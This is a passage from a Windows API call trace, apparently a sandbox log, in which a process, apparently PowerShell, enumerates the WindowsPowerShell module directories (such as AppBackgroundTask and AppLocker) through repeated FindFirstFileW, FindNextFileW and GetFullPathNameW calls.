ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0151.385] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0151.385] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0151.386] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0151.386] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508e0e0 | out: lpFindFileData=0xafa508e0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0151.386] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e340) returned 1 [0151.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0151.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.388] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0151.388] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b5790 [0151.394] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.394] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0151.394] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0151.394] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0151.394] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0151.395] FindNextFileW (in: hFindFile=0x2386d3b5790, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0151.395] FindClose (in: hFindFile=0x2386d3b5790 | out: hFindFile=0x2386d3b5790) returned 1 [0151.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.396] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0151.396] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4710 [0151.398] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.398] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0151.398] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0151.398] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0151.398] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0151.399] FindNextFileW (in: hFindFile=0x2386d3b4710, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.399] FindClose (in: hFindFile=0x2386d3b4710 | out: hFindFile=0x2386d3b4710) returned 1 [0151.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.401] CoTaskMemAlloc (cb=0x20e) returned 0x2386b586890 [0151.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2386b586890, nSize=0x105 | out: lpBuffer="") returned 0x0 [0151.401] CoTaskMemFree (pv=0x2386b586890) [0151.419] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0151.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.419] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0151.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.420] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0151.420] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0xafa508dff0 | out: lpFindFileData=0xafa508dff0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4830 [0151.421] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.422] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0151.422] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0151.422] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0151.423] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0151.424] FindNextFileW (in: hFindFile=0x2386d3b4830, lpFindFileData=0xafa508dfb0 | out: lpFindFileData=0xafa508dfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0151.424] FindClose (in: hFindFile=0x2386d3b4830 | out: hFindFile=0x2386d3b4830) returned 1 [0151.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e210) returned 1 [0151.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1d0) returned 1 [0151.426] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0151.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.429] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0151.429] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b4ad0 [0151.430] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0151.430] FindNextFileW (in: hFindFile=0x2386d3b4ad0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0151.430] FindClose (in: hFindFile=0x2386d3b4ad0 | out: hFindFile=0x2386d3b4ad0) returned 1 [0151.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e280) returned 1 [0151.431] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508dd60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0151.431] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xafa508df90 | out: lpFindFileData=0xafa508df90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2386d3b50d0 [0151.431] FindNextFileW (in: hFindFile=0x2386d3b50d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.431] FindNextFileW (in: hFindFile=0x2386d3b50d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0151.431] FindNextFileW (in: hFindFile=0x2386d3b50d0, lpFindFileData=0xafa508df50 | out: lpFindFileData=0xafa508df50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.431] FindClose (in: hFindFile=0x2386d3b50d0 | out: hFindFile=0x2386d3b50d0) returned 1 [0151.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e1b0) returned 1 [0151.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e170) returned 1 [0151.432] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508de40, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0151.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e290) returned 1 [0151.432] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0xafa508e370 | out: lpFileInformation=0xafa508e370*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0151.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e250) returned 1 [0151.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e2e0) returned 1 [0151.432] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xafa508ddc0, lpFilePart=0x0 | out: 